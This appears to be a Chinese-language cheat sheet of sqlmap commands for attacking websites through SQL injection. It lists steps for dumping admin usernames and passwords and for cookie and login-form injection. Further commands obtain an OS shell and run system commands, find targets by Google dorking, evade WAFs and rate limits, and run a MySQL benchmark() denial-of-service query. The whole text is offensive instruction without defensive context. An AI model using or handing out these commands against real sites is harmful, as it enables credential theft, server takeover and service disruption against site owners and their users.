access 注入
./sqlmap.py -u "url" 注入判斷
./sqlmap.py -u "url" --tables 跑表
./sqlmap.py -u "url" --columns -T admin 猜解字段
./sqlmap.py -u "url" --dump -T admin -C "username,password"
mysql系列課程
sqlmap -u "url" --dbs 擷取資料庫
sqlmap -u "url" -D myslibrary --tables 擷取資料庫中的表 這裡是猜解爆破資料
sqlmap -u "url" -D myslibrary --T hy_admin --columns 爆列名
sqlmap -u "url" -D myslibrary --T hy_admin -C id,user,password --dump 擷取字段内容
cookie注入
sqlmap -u "url" --cookie "id=9" --table --level 2 cookie注入
sqlmap -u "url" --cookie "id=9" --columns -T admin --level 2 爆表
sqlmap -u "url" --cookie "id=9" --dump -T admin -C "username,password" --level 2
post登陸框注入
自動搜尋表單
sqlmap -u "url" --forms 自動注入
sqlmap -u "url" --data "參數" 指定參數注入
互動寫shell 及指令執行
sqlmap -u "url" --os-cmd=ipconfig
sqlmap -u "url" --os-shell 擷取shell
僞靜态注入
sqlmap -u "url?id=54*.html" --dbs 在注入的地方放一個*字鍵 然後進行注入
sqlmap -u "url?id=54*.html" -D preem --tables 擷取表
sqlmap -u "url?id=54*.html" -D preem -T pe_user --columns 得到列
sqlmap -u "url?id=54*.html" -D preem -T pe_user --C password
sqlmap -u "url?id=54*.html" -D preem -T pe_user --C password --dump
請求延時 繞過網站的一些防護
sqlmap --dbs -u "url/40*.html" --delay 1 根據1秒來擷取
sqlmap --dbs -u "url/40*.html" --safe-freq 2 2次請求之後通路一個正确界面
來把google
sqlmap -g inurl:php?id=1
mysql dos攻擊
sqlmap -u "url" --sql-shell 首先擷取shell
select benchmark(999999999999,0x70726f626e646f70726f62616e646f70726f62616e646ff)
繞過waf防火牆
sqlmap -u "url" -v 3 --dbs --batch --tamper "charencode.py" 可以繞過一些過濾進行注入
sqlmap -u "url" --privileges 檢視目前使用者權限